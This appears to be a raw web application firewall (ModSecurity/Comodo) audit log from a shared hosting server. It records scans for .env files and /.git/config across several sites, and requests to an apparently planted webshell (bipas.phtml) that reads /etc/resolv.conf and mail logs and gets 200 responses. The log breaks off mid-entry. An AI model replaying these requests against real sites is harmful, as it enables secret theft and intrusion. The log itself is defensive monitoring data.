text/html; charset=UTF-8 --a526ac01-H-- Message: Warning. Matched phrase "etc/resolv.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/resolv.conf found within ARGS:viewfile: /etc/resolv.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/resolv.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/resolv.conf found within ARGS:viewfile: /etc/resolv.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3iZYMswQnJ3NDxjDY-fAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749934693105829 3762 (- - -) Stopwatch2: 1749934693105829 3762; combined=1992, p1=355, p2=1501, p3=33, p4=29, p5=74, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a526ac01-Z-- --cfc5aa5c-A-- [15/Jun/2025:02:31:43.706930 +0530] aE3jN9laOcxgn8EdjwOt7wAAAAc 18.213.240.226 43352 127.0.0.1 7081 --cfc5aa5c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/mail.err.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.213.240.226 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --cfc5aa5c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --cfc5aa5c-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3jN9laOcxgn8EdjwOt7wAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749934903701811 5195 (- - -) Stopwatch2: 1749934903701811 5195; combined=3041, p1=417, p2=2441, p3=52, p4=45, p5=86, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cfc5aa5c-Z-- --92ebaa62-A-- [15/Jun/2025:02:32:52.322353 +0530] aE3je-Qxpfcsz2uNnR-hvwAAAAI 94.74.164.43 34042 127.0.0.1 7081 --92ebaa62-B-- GET /.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --92ebaa62-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --92ebaa62-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/.env"] [unique_id "aE3je-Qxpfcsz2uNnR-hvwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934971084484 1237943 (- - -) Stopwatch2: 1749934971084484 1237943; combined=1736, p1=331, p2=1301, p3=0, p4=0, p5=104, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92ebaa62-Z-- --28b9b319-A-- [15/Jun/2025:02:32:58.878612 +0530] aE3jgeXds7bzDL-AINRWyQAAAAM 94.74.164.43 34352 127.0.0.1 7081 --28b9b319-B-- GET /.env.local HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --28b9b319-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --28b9b319-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/.env.local"] [unique_id "aE3jgeXds7bzDL-AINRWyQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934977555950 1322737 (- - -) Stopwatch2: 1749934977555950 1322737; combined=1953, p1=398, p2=1456, p3=0, p4=0, p5=98, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --28b9b319-Z-- --d7696728-A-- [15/Jun/2025:02:33:05.978713 +0530] aE3jiPBViRrxRfhQ2snPKAAAAAE 94.74.164.43 48046 127.0.0.1 7081 --d7696728-B-- GET /.env.production HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --d7696728-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --d7696728-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/.env.production"] [unique_id "aE3jiPBViRrxRfhQ2snPKAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934984713086 1265687 (- - -) Stopwatch2: 1749934984713086 1265687; combined=2551, p1=553, p2=1919, p3=0, p4=0, p5=79, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d7696728-Z-- --e1898510-A-- [15/Jun/2025:02:33:18.544464 +0530] aE3jldlaOcxgn8EdjwOuGQAAAAc 52.138.214.36 38782 127.0.0.1 7081 --e1898510-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 52.138.214.36 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --e1898510-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --e1898510-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "archangledesignstudio.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE3jldlaOcxgn8EdjwOuGQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934997697589 846936 (- - -) Stopwatch2: 1749934997697589 846936; combined=2082, p1=330, p2=1639, p3=0, p4=0, p5=112, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1898510-Z-- --a75f8504-A-- [15/Jun/2025:02:33:19.801969 +0530] aE3jltAcUP5X8o425y3VIwAAAAQ 94.74.164.43 38810 127.0.0.1 7081 --a75f8504-B-- GET /wp-content/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --a75f8504-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --a75f8504-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/wp-content/.env"] [unique_id "aE3jltAcUP5X8o425y3VIwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934998645905 1156169 (- - -) Stopwatch2: 1749934998645905 1156169; combined=1845, p1=360, p2=1349, p3=0, p4=0, p5=136, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a75f8504-Z-- --47299302-A-- [15/Jun/2025:02:33:28.219534 +0530] aE3jniQOy0yoNZQ7dslLuAAAAAk 94.74.164.43 39480 127.0.0.1 7081 --47299302-B-- GET /application/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --47299302-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --47299302-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/application/.env"] [unique_id "aE3jniQOy0yoNZQ7dslLuAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935006890092 1329512 (- - -) Stopwatch2: 1749935006890092 1329512; combined=2243, p1=488, p2=1659, p3=0, p4=0, p5=95, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47299302-Z-- --aad9867d-A-- [15/Jun/2025:02:33:34.454587 +0530] aE3jpZ4hb3-ZG-auIyDMTAAAAAg 94.74.164.43 42362 127.0.0.1 7081 --aad9867d-B-- GET /app/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --aad9867d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --aad9867d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/app/.env"] [unique_id "aE3jpZ4hb3-ZG-auIyDMTAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935013133404 1321265 (- - -) Stopwatch2: 1749935013133404 1321265; combined=206782, p1=411, p2=1403, p3=0, p4=0, p5=102542, sr=101, sw=1, l=0, gc=102425 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aad9867d-Z-- --68603512-A-- [15/Jun/2025:02:33:40.730091 +0530] aE3jq9laOcxgn8EdjwOuIgAAAAc 94.74.164.43 34244 127.0.0.1 7081 --68603512-B-- GET /config/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --68603512-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --68603512-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/config/.env"] [unique_id "aE3jq9laOcxgn8EdjwOuIgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935019547119 1183035 (- - -) Stopwatch2: 1749935019547119 1183035; combined=1977, p1=377, p2=1507, p3=0, p4=0, p5=92, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68603512-Z-- --ef74c04b-A-- [15/Jun/2025:02:33:52.003417 +0530] aE3jtm1_24bael5AsqHHIAAAAAo 94.74.164.43 40630 127.0.0.1 7081 --ef74c04b-B-- GET /api/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --ef74c04b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ef74c04b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/api/.env"] [unique_id "aE3jtm1_24bael5AsqHHIAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935030817003 1186489 (- - -) Stopwatch2: 1749935030817003 1186489; combined=1636, p1=349, p2=1190, p3=0, p4=0, p5=96, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef74c04b-Z-- --743ddf20-A-- [15/Jun/2025:02:34:04.698825 +0530] aE3jw-Qxpfcsz2uNnR-h3wAAAAI 94.74.164.43 46494 127.0.0.1 7081 --743ddf20-B-- GET /laravel/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --743ddf20-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --743ddf20-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/laravel/.env"] [unique_id "aE3jw-Qxpfcsz2uNnR-h3wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935043469977 1228914 (- - -) Stopwatch2: 1749935043469977 1228914; combined=2061, p1=373, p2=1567, p3=0, p4=0, p5=120, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --743ddf20-Z-- --ca6b2025-A-- [15/Jun/2025:02:34:13.639971 +0530] aE3jzIMswQnJ3NDxjDY_CAAAAAA 94.74.164.43 48990 127.0.0.1 7081 --ca6b2025-B-- GET /library/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --ca6b2025-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ca6b2025-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/library/.env"] [unique_id "aE3jzIMswQnJ3NDxjDY_CAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935052474209 1165823 (- - -) Stopwatch2: 1749935052474209 1165823; combined=1959, p1=366, p2=1502, p3=0, p4=0, p5=90, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca6b2025-Z-- --5b44740f-A-- [15/Jun/2025:02:34:20.984823 +0530] aE3j0yQOy0yoNZQ7dslL0QAAAAk 94.74.164.43 54134 127.0.0.1 7081 --5b44740f-B-- GET /nextjs-app/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --5b44740f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --5b44740f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/nextjs-app/.env"] [unique_id "aE3j0yQOy0yoNZQ7dslL0QAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935059737634 1247250 (- - -) Stopwatch2: 1749935059737634 1247250; combined=1670, p1=379, p2=1198, p3=0, p4=0, p5=93, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5b44740f-Z-- --13935d72-A-- [15/Jun/2025:02:34:38.543082 +0530] aE3j5dlaOcxgn8EdjwOuOQAAAAc 94.74.164.43 60402 127.0.0.1 7081 --13935d72-B-- GET /node-api/.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 94.74.164.43 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip, deflate, br --13935d72-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --13935d72-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/node-api/.env"] [unique_id "aE3j5dlaOcxgn8EdjwOuOQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935077129429 1413722 (- - -) Stopwatch2: 1749935077129429 1413722; combined=1681, p1=379, p2=1214, p3=0, p4=0, p5=87, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13935d72-Z-- --b7691061-A-- [15/Jun/2025:02:38:37.846297 +0530] aE3k1PBViRrxRfhQ2snPogAAAAE 34.32.129.254 49998 127.0.0.1 7081 --b7691061-B-- GET /.git/config HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 34.32.129.254 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --b7691061-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --b7691061-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/.git/config"] [unique_id "aE3k1PBViRrxRfhQ2snPogAAAAE"] Apache-Handler: 